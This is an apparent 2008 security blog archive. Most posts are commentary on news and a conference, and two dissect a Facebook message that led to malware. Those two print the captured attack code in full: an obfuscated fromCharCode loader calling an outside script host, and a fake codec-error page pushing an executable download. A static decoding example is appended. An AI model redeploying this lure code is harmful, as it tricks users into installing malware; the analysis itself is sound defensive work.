Sunday, November 30, 2008

All-Time Best 404

Hope you're all having a good close to the long weekend...

I just had to share this. As I'm reading some posts and catching up from being off my computer for the last 2 days or so... I hit this on accident:

http://www.darkc0de.com/images/404.jpg

This is perhaps the best 404 ever.

Wednesday, November 26, 2008

Thanksgiving 2008...Give Thanks and Be Grateful

Happy Thanksgiving everyone, first and foremost.

Now let's get to it. Given that you're probably reading this on your day off, expecting family over or headed out yourself I will keep it short.

Thanksgiving Day here in the United States brings us to the thought of family, charity - and generally giving thanks for the blessings and good fortune in our lives. This year, on the eve of the US holiday, Mumbai was attacked by terrorists, and held hostage. From what I've been able to gather from news reports, view interviews and feeds and articles the whole attack was perpetrated by several people with a relatively low-tech attack. While the attacks were low-tech they were precise, deadly, and make no mistake... locked down the entire city of Mumbai and killed at least 20, and injured at least 900. As the toll rises, I can't help but think of the ramifications for security and the blistering speed of "westernization" that India is undergoing.

I can't even begin to guess the percentage of companies that have data, infrastructure, and people over in India who will be impacted by this incident. The ramifications are much more severe than the burned buildings and the hotels, cafes, and tourist spots leveled. There was a significant loss of life - but think of it this way - how easy was this?! From every report I've been able to find these attacks were simple to execute, and inflicted maximal damage with relatively little firepower. How protected is your physical and intellectual property overseas? Terrorism isn't just about killing people (although sometimes you wouldn't notice) but it's about disrupting Western life. Taking out a few major data centers, development centers, and IT centers in India would absolutely devastate many Western companies that are heavily outsourced into India and beyond.

So this Thanksgiving holiday... ask yourself how insulated your company is from catastrophic issues in the event this attack in Mumbai was just a pre-cursor to something much, much bigger.

Try not to choke on that turkey leg.


References:
[1] http://www.msnbc.msn.com/id/27928718?GT1=43001
[2] http://www.bloomberg.com/apps/news?pid=20601087&sid=asZkegbDKxQw&refer=home
[3] http://www.reuters.com/article/topNews/idUSTRE4AP6PI20081126?feedType=RSS&feedName=topNews

Sunday, November 23, 2008

A Perspective on National Security

My newswire inbox has been flooded over the past few days with articles about President-elect Obama's phone records being breached by unknown Verizon Wireless employees.

Then there was the matter of Sarah Palin's Yahoo! email being hacked (actually, password-hint guessed) which took center stage right as the election started to heat up down the stretch...

... and McCain and Obama's websites were hacked during the course of the election, multiple times as a matter of claims.

This brings me to what I want to draw your attention to - national security.  At which point in these data breaches did we cross over into a threat to national security?

Some would argue it happened when Palin's email was "hacked into"... possibly - but you have to ask yourself what sort of twit would discuss matters of national security over public webmail!

Others have tried to argue that Obama or McCain's sites being hacked was a matter of national security ... please, seriously?

This brings me to the matter of Obama's cell phone records being snooped.  Depending on which version of the story you believe, one of Obama's people says that the cell phone that was snooped on hadn't been used for a while, OK - but work with me on this one.  Cell phone records (numbers called, if voicemail was left, and such) are a dangerous tool.  Imagine if someone knew who you called - they could certainly use that to say, blackmail you, once you were in a position of power.  Call me a conspiracy theorist, but I'd say this could be a far more dangerous situation and requires Secret Service attention... not the ridiculous things they and the FBI have been chasing lately.

You have to wonder... is our notion of national security in the digital realm as well-focused as it should be?  Do we properly understand the threats?  Furthermore, does our government, the people who send the big guns and write the laws, have the proper grasp of technology that it should?

My obvious answer would be ... no.  So to the incoming President - please hire someone with a clue?

As a cynical side-note, someone identified as "Jeff" left this comment:

 
November 21st, 2008 9:54 pm ET

With all the wiretappings going on via Bush's WOT, why didn't Homeland Security discover this?

---Good one Jeff.

Tuesday, November 18, 2008

CSI Conference 2008 - Notes

Hey folks, in my other blog I published an entry of notes from the App Sec Summit, CSI Annual Conference here in Washington, DC.

Please give it a read, as it's a lot simpler to cross-post a link rather than re-writing the blog entry all over again.

Check it out!
http://www.communities.hp.com/securitysoftware/blogs/rafal/archive/2008/11/19/csi-annual-conference-take-aways-on-web-app-security.aspx

Monday, November 17, 2008

CSI 2008 - First Thoughts

So... my first impressions of this Computer Security Institute [CSI] 2008 conference here in National Harbor, MD - as follows:

  • Lots of people are here from all sorts of companies, and of all kinds of ranks, from all over the Americas (I saw name tags from Canada as well as the US; with CISOs, architects and engineers present)

  • The F5 "Email Station" kiosks - essentially a bunch of laptops which you can check email from. Seriously? At a security conference? And yes... there were people walking up and using webmail on these laptops. More proof that even with our own ranks, security people aren't paranoid enough - think keyloggers!




The morning's keynote was given in part by Brian Snow, of NSA fame. He had some bulletpoints I think would be good take-aways for everyone, my commentary is included:
  • "Better security" isn't a product we can sell to people, so it isn't happening effectively. Companies are in the business of making products (and selling them) and not securing you/us.

  • "Solving ahead" is a design process step by which we address all conceivable possible attacks against a "thing" before that thing is sent off for production. This process involves thinking many steps ahead of the initial attack and requires some smart people during the design phases... do you have those at your company?

  • An interesting topic (although not a new one) was brought back up about minimizing the contextual value of data - meaning, data stolen from one domain needs to be without value in another domain. How do we solve this issue? Credit card companies are already doing this with one-time use credit card numbers... what about other data?

  • Designers of software/hardware/stuff allow for bad decisions to be made by end-users. Why? This is a lot tougher to root out than you may think, people want those 'bad choices' in their options.

  • Learn to speak executive. If you don't have the ability to translate our "security geek" language into execu-speak you're going to continue to fail to make your point.

As a side note... are you an INTJ? How does that affect the way you design and solve problems? Think about it.

More soon...

Sunday, November 16, 2008

Nov 17th - CSI Conference

Hey everyone, as you read this I'll be attending the CSI Conference in National Harbor, MD.

Over the next 3 days I'll cover the conference, and some of the events, sessions and discussions that take place. This year promises to be one that we address how to fix some of the issues we've uncovered over the course of the past year or so. I was invited by Robert Richardson since I've been complaining publicly about the lack of "so now what" solutions to the problems we face and find.

Stay tuned, if you can't be here, hopefully I'll be able to convey some good information.

In the meantime, check out this weird case of Identity Theft uncovered in upstate New York. This has got to be one of the strangest [undated] "hacks" I've heard of recently. Hacking eBay isn't a new concept, neither is identity theft... but I thought this was rather clever.

[1] http://www.cbs6albany.com/news/chief_1258582___article.html/crimetracker_heider.html

Sunday, November 9, 2008

Facebook Worm/Hack Follow-Up...

If you haven't read the previous post on the FaceBook "email hack/possible worm", you can read it here first.

In response to the post, my friend Rob Ragan was kind enough to spend some of his time dissecting it and provided further analysis... Here is that analysis. Thanks to Rob for this.

------------------------------{analysis}-----------

Some googling after dissecting the info below yielded this:
document.write(String.fromCharCode(96+60-96,96+115
-96,96+99-96,96+114-96,96+105-96,96+112-96,96+116-96,96+
32-96,96+115-96,96+114-96,96+99-96,96+61-96,96+39-96,96+
104-96,96+116-96,96+116-96,96+112-96,96+58-96,96+47-96,
96+47-96,96+108-96,96+111-96,96+115-96,96+116-96,96+97-
96,96+114-96,96+116-96,96+46-96,96+105-96,96+110-96,96+
102-96,96+111-96,96+47-96,96+106-96,96+115-96,96+47-96,
96+106-96,96+115-96,96+46-96,96+106-96,96+115-96,96+39
-96,96+62-96,96+60-96,96+47-96,96+115-96,96+99-96,96+114
-96,96+105-96,96+112-96,96+116-96,96+62-96));


Writes out
{script src="http://lostart.info/js/js.js" /}

which contains
location="http://off34.com/go/fb.php/"

Which then gives a 302 redirect to
http://youtube-spyvideo.com/youtube_file.html

Which has an iframe like so
{IFRAME src="http://ahdirz.com/movie1.php?id=638&n=teen" height="100%" width="100%" border="0"}
Which gives us a final destination of
http://top100clipz.com/m6/movie1.php?id=638&n=teen
and this screen shot.

Thanks to all this:
{script language="javascript" src="http://top100clipz.com/popup/pop1_2007-09-04.js?id=638"}{/script}
{script language="javascript" src="http://top100clipz.com/popup/pre_2007-09-04.js?id=638"}{/script}
{script language="jscript.encode" src="http://top100clipz.com/popup/pop2_2007-09-04.js?id=638"}{/script}

{html lang="en-EN"}
{head}
{meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /}
{title}Movie{/title}
{style}
body,td,th,tr,a,img {cursor:default;}
#mainbody {background-color:#000;}
#movie {border:1px solid #fff;}
#movie a {cursor:pointer;}
{/style}
{script}
function detecting(){
try
{
var testObject = new ActiveXObject("mu"+"lti"+"me"+"di"+"aCo"+"ntro"+"ls.c"+"hl");
return true;
}
catch(e)
{
;
}

return false;
}

function releaseMovie() {
if (detecting()) {
document.getElementById('playMov').innerHTML = '{embed src="http://dwnld-clips.com/movie.mpg" width="480" height="400" autostart="true" type="movie/mpg"}{/embed}';
}
}function codecDownload()
{
if (window.navigator.userAgent.indexOf("SV1") != -1 || window.navigator.userAgent.indexOf("MSIE 7") !=-1) {
return;
}
else {
window.setTimeout("location.href='http://www.cmplcoupler.com/download.php?id=638'", 3000);
}
}
{/script}
{/head}

{body id="mainbody"}{script}

var transcode = new Array;
window.transcode[0] = 'V'+'i'+'d'+'eo Act'+'iv'+'eX Obj'+'ect E'+'r'+'ror.\n\nY'+'o'+'ur brow'+'ser ca'+'nnot pl'+'a'+'y this vi'+'de'+'o file.\nCli'+'ck \'OK\' to dow'+'nlo'+'ad an'+'d install mis'+'sing V'+'id'+'eo Act'+'ive'+'X O'+'bj'+'ec'+'t.';
window.transcode[1] = 'Pl'+'e'+'as'+'e ins'+'ta'+'ll ne'+'w ve'+'rs'+'i'+'on of V'+'id'+'e'+'o Ac'+'ti'+'ve'+'X Ob'+'je'+'ct.';
window.transcode[2] = 'Yo'+'u m'+'us'+'t do'+'wn'+'lo'+'ad V'+'id'+'eo A'+'ct'+'iv'+'eX O'+'bject t'+'o pl'+'ay th'+'is v'+'ideo f'+'ile.';

{/script}
{script}

codecDownload();

{/script}
{script}

var Drag = {
obj : null,
init : function(o, oRoot, minX, maxX, minY, maxY, bSwapHorzRef, bSwapVertRef, fXMapper, fYMapper)
{
o.onmousedown = Drag.start;

o.hmode = bSwapHorzRef ? false : true ;
o.vmode = bSwapVertRef ? false : true ;

o.root = oRoot && oRoot != null ? oRoot : o ;

if (o.hmode && isNaN(parseInt(o.root.style.left ))) o.root.style.left = "0px";
if (o.vmode && isNaN(parseInt(o.root.style.top ))) o.root.style.top = "0px";
if (!o.hmode && isNaN(parseInt(o.root.style.right ))) o.root.style.right = "0px";
if (!o.vmode && isNaN(parseInt(o.root.style.bottom))) o.root.style.bottom = "0px";

o.minX = typeof minX != 'undefined' ? minX : null;
o.minY = typeof minY != 'undefined' ? minY : null;
o.maxX = typeof maxX != 'undefined' ? maxX : null;
o.maxY = typeof maxY != 'undefined' ? maxY : null;

o.xMapper = fXMapper ? fXMapper : null;
o.yMapper = fYMapper ? fYMapper : null;

o.root.onDragStart = new Function();
o.root.onDragEnd = new Function();
o.root.onDrag = new Function();
},

start : function(e)
{
var o = Drag.obj = this;
e = Drag.fixE(e);
var y = parseInt(o.vmode ? o.root.style.top : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
o.root.onDragStart(x, y);

o.lastMouseX = e.clientX;
o.lastMouseY = e.clientY;

if (o.hmode) {
if (o.minX != null) o.minMouseX = e.clientX - x + o.minX;
if (o.maxX != null) o.maxMouseX = o.minMouseX + o.maxX - o.minX;
} else {
if (o.minX != null) o.maxMouseX = -o.minX + e.clientX + x;
if (o.maxX != null) o.minMouseX = -o.maxX + e.clientX + x;
}

if (o.vmode) {
if (o.minY != null) o.minMouseY = e.clientY - y + o.minY;
if (o.maxY != null) o.maxMouseY = o.minMouseY + o.maxY - o.minY;
} else {
if (o.minY != null) o.maxMouseY = -o.minY + e.clientY + y;
if (o.maxY != null) o.minMouseY = -o.maxY + e.clientY + y;
}

document.onmousemove = Drag.drag;
document.onmouseup = Drag.end;

return false;
},

drag : function(e)
{
e = Drag.fixE(e);
var o = Drag.obj;

var ey = e.clientY;
var ex = e.clientX;
var y = parseInt(o.vmode ? o.root.style.top : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
var nx, ny;

if (o.minX != null) ex = o.hmode ? Math.max(ex, o.minMouseX) : Math.min(ex, o.maxMouseX);
if (o.maxX != null) ex = o.hmode ? Math.min(ex, o.maxMouseX) : Math.max(ex, o.minMouseX);
if (o.minY != null) ey = o.vmode ? Math.max(ey, o.minMouseY) : Math.min(ey, o.maxMouseY);
if (o.maxY != null) ey = o.vmode ? Math.min(ey, o.maxMouseY) : Math.max(ey, o.minMouseY);

nx = x + ((ex - o.lastMouseX) * (o.hmode ? 1 : -1));
ny = y + ((ey - o.lastMouseY) * (o.vmode ? 1 : -1));

if (o.xMapper) nx = o.xMapper(y)
else if (o.yMapper) ny = o.yMapper(x)

Drag.obj.root.style[o.hmode ? "left" : "right"] = nx + "px";
Drag.obj.root.style[o.vmode ? "top" : "bottom"] = ny + "px";
Drag.obj.lastMouseX = ex;
Drag.obj.lastMouseY = ey;

Drag.obj.root.onDrag(nx, ny);
return false;
},

end : function()
{
document.onmousemove = null;
document.onmouseup = null;
Drag.obj.root.onDragEnd( parseInt(Drag.obj.root.style[Drag.obj.hmode ? "left" : "right"]),
parseInt(Drag.obj.root.style[Drag.obj.vmode ? "top" : "bottom"]));
Drag.obj = null;
},

fixE : function(e)
{
if (typeof e == 'undefined') e = window.event;
if (typeof e.layerX == 'undefined') e.layerX = e.offsetX;
if (typeof e.layerY == 'undefined') e.layerY = e.offsetY;
return e;
}
};

function Downloadings(download,e)
{
if (e!=null && e.keyCode==27)
{ Close();
return;
}
switch (download)
{
case "iax": document.location.href="http://www.cmplcoupler.com/download.php?id=638"; break;
Close();
}

}

function tracking() {
if (confirm(window.transcode[0])) {
location.href="http://www.cmplcoupler.com/download.php?id=638";
}
else {
if (alert(window.transcode[1])) {
tracking();
}
else {
tracking();
}
}
}

function Close()
{
var p=document.getElementById("popdiv");
p.style.visibility="hidden";
tracking();
}
function Details()
{
alert(window.transcode[2]);
}

{/script}

{div name="popdiv" id="popdiv" onKeyPress="Downloadings('iax',event);" style="visibility:hidden; z-index:1;position:absolute;top:0px;left:0px;"}
{table width="474" cellpadding="0" cellspacing="0"}
{tr}
{td height="28" width="8" style="background-image:url(/img/vista-ltc.gif);"}{/td}
{td height="28" width="458" style="background-image:url(/img/vista-bgtop.gif);"}
{table width="458" cellpadding="0" cellspacing="0"}
{tr}
{td style="font-size: 12px; font-family:Segoe UI; color: #000000; padding-top:5px; padding-left: 6px;" id="w_title"}{/td}
{script} document.getElementById('w_title').innerHTML = "V"+"ide"+"o Ac"+"tiv"+"eX Ob"+"je"+"ct Er"+"ro"+"r.";{/script}
{td width="28" style="padding-top:6px; padding-right: 2px;"}{img src="/img/vista-close.gif" width="28" height="15" border="0" onClick="Close();" style="cursor:default;" /}{/td}
{/tr}
{/table}
{td height="28" width="8" style="background-image:url(/img/vista-rtc.gif);"}{/td}
{/tr}
{tr}
{td width="8" style="background-image:url(/img/vista-bgleft.gif);"}{/td}
{td width="458" style="background-image:url(/img/vista-1x1.gif);"}
{table width="458" cellpadding="0" cellspacing="8" style="padding-top:18px; padding-bottom:18px; background-image:url(/img/vista-1x1.gif);" align="center"}
{tr}
{td width="32" style="padding-left: 18px; vertical-align: top;"}{img src="/img/vista-alert.gif" width="32" height="32" border="0" /}{/td}
{td style="font-size: 12px; font-family:Segoe UI; text-align:justify; padding-left: 4px; padding-right: 20px;" id="w_content"}
{/td}
{script} document.getElementById('w_content').innerHTML = "Your bro"+"wser ca"+"nnot dis"+"play th"+"is vi"+"deo fi"+"le. You nee"+"d to dow"+"nload new "+"vers"+"ion of Vid"+"eo Ac"+"tiveX O"+"bject to play "+"this "+"video "+"file.{"+"br}{"+"br}You need"+" to do"+"wnload new"+" vers"+"ion of Vid"+"eo Ac"+"tiveX Obje"+"ct to p"+"lay th"+"is v"+"ideo f"+"ile.";{/script}
{/tr}
{/table}
{table width="458" height="52" cellpadding="0" cellspacing="0" style="background-color: #f0f0f0;padding-right: 8px;"}
{tr}
{td}
{table align="right" cellpadding="4" cellspacing="0"}
{tr}
{td}{input type="button" value="Continue" onClick="Downloadings('iax');" style="font-size:12px; font-family:Segoe UI; height:24px; width:91px;" tabindex="1" ID="Button1" NAME="Button1"}{/td}
{td}{input type="button" value="Cancel" onClick="Close()" style="font-size:12px; font-family:Segoe UI; height:24px; width:91px;" ID="Button3" NAME="Button3"}{/td}
{td}{input type="button" value="Details..." onClick="Details()" style="font-size:12px; font-family:Segoe UI; height:24px; width:91px;" ID="Button3" NAME="Button3"}{/td}
{/tr}
{/table}
{/td}
{/tr}
{/table}
{/td}
{td width="8" style="background-image:url(/img/vista-bgright.gif);"}{/td}
{/tr}
{tr}
{td height="8" width="8" style="background-image:url(/img/vista-lbc.gif);"}{/td}
{td height="8" width="458" style="background-image:url(/img/vista-bgbottom.gif);"}{/td}
{td height="8" width="8" style="background-image:url(/img/vista-rbc.gif);"}{/td}
{/tr}
{/table}
{script}
if (navigator.userAgent.indexOf("Firefox")!=-1) {
if (detecting()) { } else {
setTimeout("Close();", 1000);
}
}
else {
if (detecting()) { } else {
setTimeout("showPopDiv();",2000);
}
}

function showPopDiv()
{
var sFlag = "No";
var byFlag = false;
var FlagAr = sFlag.split("");

if (FlagAr[0]=="1"){byFlag = true;}
if (FlagAr[0]=="3"){byFlag = true;}


if(!byFlag) {
var p=document.getElementById("popdiv");
wmpwidth=document.body.clientWidth/2-181;
wmpheight=document.body.clientHeight/2-120;
p.style.top = wmpheight;
p.style.left = wmpwidth;
p.style.visibility = "visible";
p.focus();
}
}

Drag.init(document.getElementById("popdiv"));
{/script}
{/div}

{table id="movie" align="center" cellpadding="0" cellspacing="0"}{tr}{td id="playMov"}{a href="http://www.cmplcoupler.com/download.php?id=638"}{img width="450" style="cursor:pointer;" onMouseOver="window.status = window.transcode[2];" height="369" border="0" alt="You must download Video ActiveX Object to play this video file." src="/img/mov.gif"/}{/a}{/td}{/tr}{/table}
{script}releaseMovie();{/script}

{/body}
{/html}
-----------------------------{/analysis}-----------

Final Word:
Wow! Thanks Rob for that analysis... Looking through all that code, redirects and mis-direction you can clearly see the final result is an attempt to get the user to install some setup.exe file, as a "missing codec" for whatever video you are presumably being redirected to. Fascinating! If anyone has been able to grab that setup.exe file please let me know, I have not been able to get it to download properly as of this morning.
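
As an added example (not part of the original post or of Rob's analysis), here is one way to undo the two obfuscation tricks in the captured pages, the String.fromCharCode arithmetic and the split string literals, statically and without executing or fetching anything. The function names are illustrative assumptions; both sample inputs are copied from the code posted above.

```javascript
// Added example: static decoding only. The samples are never evaluated or fetched.

// Evaluate one fromCharCode argument such as "96+60-96". Only integer addition
// and subtraction are accepted; identifiers, calls and other operators throw.
function evalCharArg(arg) {
  const compact = arg.replace(/\s+/g, '');
  if (!/^[+-]?\d+(?:[+-]\d+)*$/.test(compact)) {
    throw new Error('unsupported expression: ' + arg);
  }
  let total = 0;
  for (const term of compact.match(/[+-]?\d+/g)) total += parseInt(term, 10);
  if (total < 0 || total > 0xffff) throw new Error('not a UTF-16 code unit: ' + total);
  return total;
}

// Decode every String.fromCharCode(...) call found in `source`.
function decodeFromCharCode(source) {
  const call = /String\s*\.\s*fromCharCode\s*\(([^()]*)\)/g;
  const decoded = [];
  let m;
  while ((m = call.exec(source)) !== null) {
    const args = m[1].trim();
    const units = args === '' ? [] : args.split(',').map(evalCharArg);
    decoded.push(String.fromCharCode(...units));
  }
  return decoded;
}

// Merge adjacent string literals joined by "+" ('Vid'+'eo' -> 'Video').
// Literals are tokenized first so quotes stay aligned. This is a reading aid:
// it ignores comments and precedence (e.g. 'a'+'b'.length), so never run the output.
function foldStringConcat(source) {
  const token = /(['"])((?:\\.|(?!\1)[^\\\n])*)\1|[\s\S]/g;
  let out = '';
  let held = null; // last literal, kept back until we know what follows it
  let gap = '';    // text seen since `held`
  const flush = () => {
    if (held) out += held.quote + held.body + held.quote;
    out += gap;
    held = null;
    gap = '';
  };
  let m;
  while ((m = token.exec(source)) !== null) {
    if (m[1] === undefined) {            // ordinary character
      if (!held) { out += m[0]; continue; }
      gap += m[0];
      if (!/^\s*\+?\s*$/.test(gap)) flush();
    } else if (held && held.quote === m[1] && /^\s*\+\s*$/.test(gap)) {
      held.body += m[2];                 // literal + literal: merge
      gap = '';
    } else {
      flush();
      held = { quote: m[1], body: m[2] };
    }
  }
  flush();
  return out;
}

// Pull URLs out of decoded text and defang them for notes and reports.
function extractUrls(text) {
  return text.match(/https?:\/\/[^\s'"<>{}]+/g) || [];
}
function defang(url) {
  return url.replace(/^http/i, 'hxxp').replace(/\./g, '[.]');
}

// Sample 1: the String.fromCharCode call as posted above, line wraps included.
const SAMPLE_CHARCODE = `document.write(String.fromCharCode(96+60-96,96+115
-96,96+99-96,96+114-96,96+105-96,96+112-96,96+116-96,96+
32-96,96+115-96,96+114-96,96+99-96,96+61-96,96+39-96,96+
104-96,96+116-96,96+116-96,96+112-96,96+58-96,96+47-96,
96+47-96,96+108-96,96+111-96,96+115-96,96+116-96,96+97-
96,96+114-96,96+116-96,96+46-96,96+105-96,96+110-96,96+
102-96,96+111-96,96+47-96,96+106-96,96+115-96,96+47-96,
96+106-96,96+115-96,96+46-96,96+106-96,96+115-96,96+39
-96,96+62-96,96+60-96,96+47-96,96+115-96,96+99-96,96+114
-96,96+105-96,96+112-96,96+116-96,96+62-96));`;

// Sample 2: two split-string lines from the fake-codec page above.
const SAMPLE_SPLIT = `var testObject = new ActiveXObject("mu"+"lti"+"me"+"di"+"aCo"+"ntro"+"ls.c"+"hl");
window.transcode[1] = 'Pl'+'e'+'as'+'e ins'+'ta'+'ll ne'+'w ve'+'rs'+'i'+'on of V'+'id'+'e'+'o Ac'+'ti'+'ve'+'X Ob'+'je'+'ct.';`;

function analyzeSamples() {
  const decoded = decodeFromCharCode(SAMPLE_CHARCODE);
  return {
    decoded,
    urls: decoded.flatMap(extractUrls).map(defang),
    folded: foldStringConcat(SAMPLE_SPLIT),
  };
}

console.log(analyzeSamples());
```

Because the arguments are parsed rather than handed to eval, a sample that hides a function call inside the argument list makes the decoder throw instead of running it.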

Saturday, November 8, 2008

FaceBook Worm? Hack? or Worse?

Greetings from frigid Chicago!

For those of you who have accounts on these social networking sites, you know there is nothing more annoying than SPAM in your mailbox; or worse - some kind of nasty in there. Well, tonight I opened my FaceBook inbox and looked at a very strange-looking message from a friend. What struck me is that it wasn't someone that regularly sends me messages, much less links with cryptic and odd descriptions. Since this caught my attention, I decided to proceed further (using my VMWare sandbox, of course) and decided to document what I think may be a worm of some sort propagating. While I wouldn't normally jump to such a conclusion - I say this because I pinged my friend and asked him if he had sent the message and he had no idea what I was talking about.

Here's what I've been able to find so far.

1. First, let's look at the message itself (screen shot):


So I found this fascinating. First, it appears to be one of those "blanket messages" that would appear normal for most inboxes, except that the two of us generally don't send messages back and forth with cryptic subjects like that... much less such a cryptic body with strange link.

2. Then I decided to fire up my VMWare sandbox and follow the link, for better or worse; from within FaceBook. This is what I found...

I was fascinated that FaceBook was able to determine (through their internal workings) that the site I was about to navigate to was malicious. Interesting! Of course, this wouldn't deter me.

3. Navigating to that malicious site, using FireFox and NoScript on, I got this little gem captured for your viewing pleasure... What's interesting is that 76.x.x.x address there is my IP...


4. I then went and captured the landing page that gave me the above screen shot, the code from that page is here:
{script language="JavaScript"}var PUpage="76001548"; var PUprop="geocities"; {/script}{script language="JavaScript" src="http://www.geocities.com/js_source/pu5geo.js"}{/script}{script language="JavaScript"} var thGetOv="http://themis.geocities.yahoo.com/themis/h.php"; var thCanURL="http://us.geocities.com/adanbates84/index.htm"; var thSpaceId="76001548"; var thIP="76.243.224.30"; var thTs="1226206771"; var thCs="6903e27d9a64b4137d7d872f68c57349";{/script}{noscript}{link rel="stylesheet" href="http://themis.geocities.yahoo.com/jsoff.css?thIP=76.243.224.30&thTs=1226206771"}{/noscript}{script language="JavaScript" src="http://us.geocities.com/js_source/geovck08.js"}{/script}
{!-- text above generated by server. PLEASE REMOVE --}
{html}{head}{script}function handleError(){try{window.parent.location=location;}catch(e){}try{window.top.location=location;}catch(e){}}window.onerror=handleError;if(window.parent.frames.length}0){if(window.parent.document.body.innerHTML){}}{/script}{script}document.write(String.fromCharCode(96+60-96,96+115-96,96+99-96,96+114-96,96+105-96,96+112-96,96+116-96,96+32-96,96+115-96,96+114-96,96+99-96,96+61-96,96+39-96,96+104-96,96+116-96,96+116-96,96+112-96,96+58-96,96+47-96,96+47-96,96+108-96,96+111-96,96+115-96,96+116-96,96+97-96,96+114-96,96+116-96,96+46-96,96+105-96,96+110-96,96+102-96,96+111-96,96+47-96,96+106-96,96+115-96,96+47-96,96+106-96,96+115-96,96+46-96,96+106-96,96+115-96,96+39-96,96+62-96,96+60-96,96+47-96,96+115-96,96+99-96,96+114-96,96+105-96,96+112-96,96+116-96,96+62-96));{/script}{title}Angelina Jolie Fucking Cartoons{/title}{/head}{body}
{!-- following code added by server. PLEASE REMOVE --}
{link href="http://us.geocities.com/js_source/div.css" rel="stylesheet" type="text/css"}{script language="JavaScript" src="http://us.geocities.com/js_source/div03.js"}{/script}
{!-- preceding code added by server. PLEASE REMOVE --}This is video with you. You're doing something funny there.{/body}{/html}{!-- text below generated by server. PLEASE REMOVE --}{/object}{/layer}{/div}{/span}{/style}{/noscript}{/table}{/script}{/applet}{script language="JavaScript" src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"}{/script}{script language="JavaScript" src="http://us.js2.yimg.com/us.js.yimg.com/lib/smb/js/hosting/cp/js_source/geov2_001.js"}{/script}{script language="javascript"}geovisit();{/script}{noscript}{img src="http://visit.geocities.yahoo.com/visit.gif?us1226206771" alt="setstats" border="0" width="1" height="1"}{/noscript}

{IMG SRC="http://geo.yahoo.com/serv?s=76001548&t=1226206771&f=us-w90" ALT=1 WIDTH=1 HEIGHT=1}
I highlighted in red the part that I found most interesting. I haven't converted that yet - but will shortly and post that as well. I think it's interesting, at very least.

Here is that string again, in case Blogger doesn't wrap properly.
{script}document.write(String.fromCharCode(96+60-96,96+115
-96,96+99-96,96+114-96,96+105-96,96+112-96,96+116-96,96+
32-96,96+115-96,96+114-96,96+99-96,96+61-96,96+39-96,96+
104-96,96+116-96,96+116-96,96+112-96,96+58-96,96+47-96,
96+47-96,96+108-96,96+111-96,96+115-96,96+116-96,96+97-
96,96+114-96,96+116-96,96+46-96,96+105-96,96+110-96,96+
102-96,96+111-96,96+47-96,96+106-96,96+115-96,96+47-96,
96+106-96,96+115-96,96+46-96,96+106-96,96+115-96,96+39
-96,96+62-96,96+60-96,96+47-96,96+115-96,96+99-96,96+114
-96,96+105-96,96+112-96,96+116-96,96+62-96));{/script}


5. Within h.php I found something else that was interesting. Here that is:
{script language="JavaScript1.1" type="text/javascript"}

document.write('{table title="Phulki is a FREE search engine for Bollywood Music. Take a spin !!" bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw0" onfocus="ss(\'go to phulki.com \',\'aw0\')" onmouseover="ss(\'go to phulki.com \',\'aw0\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw0" target="_top" href="http://npgeodb3.geo.scd.yahoo.com/*http://www.phulki.com" onfocus="ss(\'go to phulki.com \',\'aw0\')" onmouseover="return ss(\'go to phulki.com \',\'aw0\')" onmouseout="cs()"}Enjoy Unlimited Desi Music{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Phulki is a FREE search engine for Bollywood Music. Take a spin !!{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}phulki.com{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');document.write('{/td}{/tr}{tr}{td height=12}{/td}{/tr}{tr}{td width=172 align=center valign=top}');document.write('{table title="Includes free web page, email & domain forwarding, 24-7 support." 
bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw1" onfocus="ss(\'go to domains.yahoo.com \',\'aw1\')" onmouseover="ss(\'go to domains.yahoo.com \',\'aw1\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw1" target="_top" href="http://pa.yahoo.com/*http://us.rd.yahoo.com/evt=27176/*http://smallbusiness.yahoo.com/domains/" onfocus="ss(\'go to domains.yahoo.com \',\'aw1\')" onmouseover="return ss(\'go to domains.yahoo.com \',\'aw1\')" onmouseout="cs()"}Great Value! Domain{br /}Names from Yahoo!{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Includes free web page, email & domain forwarding, 24-7 support.{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}domains.yahoo.com{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');document.write('{/td}{/tr}{tr}{td height=12}{/td}{/tr}{tr}{td width=172 align=center valign=top}');document.write('{table title="Phulki is a FREE search engine for Bollywood Music. Take a spin !!" 
